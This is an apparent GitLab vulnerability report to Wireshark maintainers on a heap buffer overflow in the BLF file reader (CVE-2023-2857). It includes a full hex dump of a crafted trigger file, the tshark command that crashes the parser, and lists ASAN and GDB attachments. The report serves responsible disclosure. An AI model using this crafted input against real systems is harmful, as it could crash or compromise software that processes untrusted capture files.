CVE-2023-2857: Heap buffer overflow vulnerability in BLF reader (#19063) · Issues · Wireshark Foundation / wireshark · GitLab

Skip to content

Open Issue created May 12, 2023 by Huascar Tejeda@htejeda

Heap buffer overflow vulnerability in BLF reader

Description:

A heap-buffer overflow vulnerability has been discovered in Wireshark’s Binary Logging Format (BLF) file processing. The vulnerability occurs in the blf_pull_logcontainer_into_memory() function in the wiretap/blf.c file. The vulnerability could be exploited by providing a maliciously crafted BLF file, which could lead to arbitrary code execution.

Tested on: Ubuntu 22.04.2 LTS

Details:

The overflow is triggered by a call to memcpy (displayed as __asan_memcpy in the ASAN output), copying 28 bytes into a memory region that is only 15 bytes large. This region was allocated in blf_pull_logcontainer_into_memory using calloc at wiretap/blf.c:499.

After the overflow, the program execution continues until it attempts to allocate memory with malloc in wmem_strdup_printf (as part of error handling), causing a crash with the message malloc(): corrupted top size.

Steps to reproduce:

$ xxd -g1 trigger
00000000: 4c 4f 47 47 30 00 00 00 30 30 30 30 30 30 30 30  LOGG0...00000000
00000010: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
00000020: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
00000030: 4c 4f 42 4a 10 00 01 00 0f 00 00 00 0a 00 00 00  LOBJ............
00000040: 02 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30  ..00000000000000
00000050: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30  0000000000000000
00000060: 30 30 30 30 30 30 30 30 30 30 30 30              000000000000

$ tshark -r trigger
malloc(): corrupted top size
Aborted

For a more detailed understanding of this vulnerability, I’ve attached the following files:

• Trigger File: This is the crafted BLF file that provokes the heap buffer overflow when processed by Wireshark.
• ASAN Output: AddressSanitizer’s (ASAN) report provides additional insight into the memory corruption.
• GDB Backtrace of Tshark: This backtrace reveals the call sequence leading up to the crash in Wireshark’s Tshark utility.
• GDB Backtrace of the Fuzzer

I’d also like to request a CVE ID for this vulnerability.

Please let me know if you need any additional information or assistance in addressing this vulnerability.

Regards,

Huáscar

trigger ASAN.txt GDB_Backtrace_tshark.txt GDB_Backtrace_fuzzer.txt